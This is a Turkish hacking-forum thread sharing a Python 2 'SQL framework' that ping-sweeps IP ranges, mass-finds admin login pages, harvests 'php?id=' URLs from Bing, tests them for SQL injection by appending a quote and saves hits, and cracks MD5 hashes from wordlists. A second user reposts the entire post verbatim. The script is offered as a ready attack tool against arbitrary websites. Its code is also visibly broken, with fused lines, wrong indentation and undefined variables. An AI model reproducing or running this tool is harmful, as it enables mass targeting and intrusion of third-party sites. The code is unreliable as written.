• Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

Yerli Script // SQL FRAMEWORK

capitan

LV
0
 
Katılım
Şub 23, 2020
Mesajlar
108
Tepkime puanı
111
Puanları
43
Öncelikle El-behram ve Kripton'un emeği geçmiştir. Python 2x sürümü ile tam 12 farklı kütüphane kullanıldı. İlk sürüm olduğundan kullanım kolaylığı pek iyi olmayabilir. İçindeki tüm toollar yerlidir.

[1] Ip ranger
[2] Mass SQL Resolver
[3] Mass Login Page Finder"
[4] Sql Scan List"
[5] MD5 Cracker"

[6] Simple Login Page Finder"


Kod:
# -*- coding: UTF-8 -*-

import requests
import re
import urllib
from time import sleep
import os
import re
import socket
import subprocess
import sys
import datetime
import base64
import hashlib

red = "\033[91m"
green = "\033[93m"
default = "\033[0m"


def pagefind():
  target = raw_input("Enter target url = ")
  txt = raw_input("Enter txt folder = ")
  directory = open(txt , 'r')
  
  for i in directory:
    fullurl = target.replace("\n","")+"/"+i
    r = requests.get(fullurl)

    if r.status_code == 200:
      print "Admin page has been found"
      print "-*-"* 40
      print fullurl
      print "_*_" * 60
    else:
      print "[-] couldn't found"

                ###############3
def crack(password,text):  password = raw_input("Enter MD5 = ")
  text = raw_input("Enter text folder = ")
  
    
  try:
    
    start = datetime.datetime.now()
    filesread = open(text , 'r').readlines()

    if len(password) == 32 and filesread !="":
      for i in filesread :
        crackpass = i.replace("\n","")
        cracking = hashlib.md5(crackpass).hexdigest()
        if cracking == password :
          print "Password has been cracked ... Well done !!"
          print "------->> " + crackpass + "<<----------"
          end = datetime.datetime.now()
          print end - start
        else:
          print "Could not found ..."
    else:
      print "This hash is not type of md5 :( "
  except IOError:
    print "Problem"
    sys.exit()def listscan():        ################### liste sql

                 
  urls = raw_input("enter url folder: ")

  openative = open(urls, 'r')
  readlive = openative.readlines()

  for i in readlive:
    urltag = i + "'"
    try:
      r = requests.get(urltag, timeout=1)

      if r.status_code == 200 and "SQL" in r.text:
        print "Link can be exploitable ... [+]"
        file2 =open('SQL.txt','a+')
          file2.write(i.replace("\n", "") + '\n')
        continue
      else:
        print "Couldn't connect ip error...[-]"
        continue
    except:
      continue

def listadmin():        ################# mass admin
  dork = raw_input("login pages dorks: ")
  dorK = open(dork,'r').readlines()
  
  sites = raw_input("enter sites: ")
  sitE = open(sites,'r').readlines()
  
  for site in sitE:
    website = sitE.replace("\n","")
    for dorks in dorK.replace("\n",""):
      url = website + dorks
      r = requests.get(url, timeout=5)
      if r.status_code == 200:
        print "found" + " " + url
        files = open("loginpages.txt", 'a+')
      else:
        print "couldnt found"
        continue

      
def iprange():      ######

  print "IP Range Scanner"
  print " "
  ip = raw_input("enter 3 part of ip address = ")
  maxrange=input("range = ")
  int(maxrange)

  for i in range(maxrange):
    param = ip + "." + str(i)
    response = os.system("ping -c 1 -w 1 " + param)
    if response == 0:
      print "[+] Founded an alive ip"
      list_ip = open("ip.txt", 'a+')
      list_ip.write(param + '\n')
      list_ip.close()

    else:
      print "[-] Dead"


def sqlihunt(dork):      ################3
 
 dork= 'IP:'+dork+" php?id= "
 
 start=0
 end=200
 sleep(3)
 print "[info]Getting Websites From Bing ... "
 while start<=end :
  try:
   con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
  
   conf = open(con[0])
   readd=conf.read()
   find=re.findall('<h2><a href="(.*?)"',readd)
   start = start+10
   #return find
  except IOError:
   print "[ERROR]network error "
   print "[Info]reconnecting "
   sleep(10)
   print "[Info]retrying "
  try :
   for i in range(len(find)):
         rez=find[i]+"'"
         tst = urllib.urlretrieve(rez)
         tstf = open(tst[0])
         tstdd= tstf.read()
         tstfind=re.findall('/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i|You have an error in your SQL syntax|Microsoft VBScript runtime error',tstdd)
         if(tstfind):
          print "[SLQi] : "+ rez
      file2 =open('sql.txt','a+')
          file2.write(rez + '\n')
      file2.close()
         else:
          print "[No SQLi ] : " + rez
  except IOError:
   print "[ERROR]No result found"
############################################3

sleep(2)
while(True):
    print default + "-*-*-*-*- MENU -*-*-*-*-*"
    print "[1] Ip ranger                 "
    print "[2] Mass SQL Resolver               "
    print "[3] Mass Login Page Finder"
    print "[4] Sql Scan List"
    print "[5] MD5 Cracker"
    print "[6] Simple Login Page Finder"
    print default + " "    funch = input("Select funch number :")


    if funch == 1:
      print "Ip ranger is starting.."
      print "enter as ---->> ab.cde.xx"
      print " "
      print " "
      iprange()
      continue

    elif funch == 2:
      print "Mass sql tool is tarting ..."
      dosya = open("ip.txt","r")
      for satir in dosya:
            sqlihunt(satir.strip())
          print " ./done "
          continue
    elif funch ==3:
      listadmin()
      continue
      
    elif funch == 4:
      listscan()
      continue
    elif funch ==5:
      crack(password,text)
      continue
    elif funch ==6:
      pagefind()
      continue
 

by.root

LV
0
 
Katılım
Eki 26, 2019
Mesajlar
178
Tepkime puanı
103
Puanları
43
Öncelikle El-behram ve Kripton'un emeği geçmiştir. Python 2x sürümü ile tam 12 farklı kütüphane kullanıldı. İlk sürüm olduğundan kullanım kolaylığı pek iyi olmayabilir. İçindeki tüm toollar yerlidir.

[1] Ip ranger
[2] Mass SQL Resolver
[3] Mass Login Page Finder"
[4] Sql Scan List"
[5] MD5 Cracker"

[6] Simple Login Page Finder"


Kod:
# -*- coding: UTF-8 -*-

import requests
import re
import urllib
from time import sleep
import os
import re
import socket
import subprocess
import sys
import datetime
import base64
import hashlib

red = "\033[91m"
green = "\033[93m"
default = "\033[0m"


def pagefind():
  target = raw_input("Enter target url = ")
  txt = raw_input("Enter txt folder = ")
  directory = open(txt , 'r')
  
  for i in directory:
    fullurl = target.replace("\n","")+"/"+i
    r = requests.get(fullurl)

    if r.status_code == 200:
      print "Admin page has been found"
      print "-*-"* 40
      print fullurl
      print "_*_" * 60
    else:
      print "[-] couldn't found"

                ###############3
def crack(password,text):  password = raw_input("Enter MD5 = ")
  text = raw_input("Enter text folder = ")
  
    
  try:
    
    start = datetime.datetime.now()
    filesread = open(text , 'r').readlines()

    if len(password) == 32 and filesread !="":
      for i in filesread :
        crackpass = i.replace("\n","")
        cracking = hashlib.md5(crackpass).hexdigest()
        if cracking == password :
          print "Password has been cracked ... Well done !!"
          print "------->> " + crackpass + "<<----------"
          end = datetime.datetime.now()
          print end - start
        else:
          print "Could not found ..."
    else:
      print "This hash is not type of md5 :( "
  except IOError:
    print "Problem"
    sys.exit()def listscan():        ################### liste sql

                 
  urls = raw_input("enter url folder: ")

  openative = open(urls, 'r')
  readlive = openative.readlines()

  for i in readlive:
    urltag = i + "'"
    try:
      r = requests.get(urltag, timeout=1)

      if r.status_code == 200 and "SQL" in r.text:
        print "Link can be exploitable ... [+]"
        file2 =open('SQL.txt','a+')
          file2.write(i.replace("\n", "") + '\n')
        continue
      else:
        print "Couldn't connect ip error...[-]"
        continue
    except:
      continue

def listadmin():        ################# mass admin
  dork = raw_input("login pages dorks: ")
  dorK = open(dork,'r').readlines()
  
  sites = raw_input("enter sites: ")
  sitE = open(sites,'r').readlines()
  
  for site in sitE:
    website = sitE.replace("\n","")
    for dorks in dorK.replace("\n",""):
      url = website + dorks
      r = requests.get(url, timeout=5)
      if r.status_code == 200:
        print "found" + " " + url
        files = open("loginpages.txt", 'a+')
      else:
        print "couldnt found"
        continue

      
def iprange():      ######

  print "IP Range Scanner"
  print " "
  ip = raw_input("enter 3 part of ip address = ")
  maxrange=input("range = ")
  int(maxrange)

  for i in range(maxrange):
    param = ip + "." + str(i)
    response = os.system("ping -c 1 -w 1 " + param)
    if response == 0:
      print "[+] Founded an alive ip"
      list_ip = open("ip.txt", 'a+')
      list_ip.write(param + '\n')
      list_ip.close()

    else:
      print "[-] Dead"


def sqlihunt(dork):      ################3
 
 dork= 'IP:'+dork+" php?id= "
 
 start=0
 end=200
 sleep(3)
 print "[info]Getting Websites From Bing ... "
 while start<=end :
  try:
   con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
  
   conf = open(con[0])
   readd=conf.read()
   find=re.findall('<h2><a href="(.*?)"',readd)
   start = start+10
   #return find
  except IOError:
   print "[ERROR]network error "
   print "[Info]reconnecting "
   sleep(10)
   print "[Info]retrying "
  try :
   for i in range(len(find)):
         rez=find[i]+"'"
         tst = urllib.urlretrieve(rez)
         tstf = open(tst[0])
         tstdd= tstf.read()
         tstfind=re.findall('/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i|You have an error in your SQL syntax|Microsoft VBScript runtime error',tstdd)
         if(tstfind):
          print "[SLQi] : "+ rez
      file2 =open('sql.txt','a+')
          file2.write(rez + '\n')
      file2.close()
         else:
          print "[No SQLi ] : " + rez
  except IOError:
   print "[ERROR]No result found"
############################################3

sleep(2)
while(True):
    print default + "-*-*-*-*- MENU -*-*-*-*-*"
    print "[1] Ip ranger                 "
    print "[2] Mass SQL Resolver               "
    print "[3] Mass Login Page Finder"
    print "[4] Sql Scan List"
    print "[5] MD5 Cracker"
    print "[6] Simple Login Page Finder"
    print default + " "    funch = input("Select funch number :")


    if funch == 1:
      print "Ip ranger is starting.."
      print "enter as ---->> ab.cde.xx"
      print " "
      print " "
      iprange()
      continue

    elif funch == 2:
      print "Mass sql tool is tarting ..."
      dosya = open("ip.txt","r")
      for satir in dosya:
            sqlihunt(satir.strip())
          print " ./done "
          continue
    elif funch ==3:
      listadmin()
      continue
      
    elif funch == 4:
      listscan()
      continue
    elif funch ==5:
      crack(password,text)
      continue
    elif funch ==6:
      pagefind()
      continue
Ellerinize sağlık ❤
 
shape1
shape2
shape3
shape4
shape7
shape8
Üst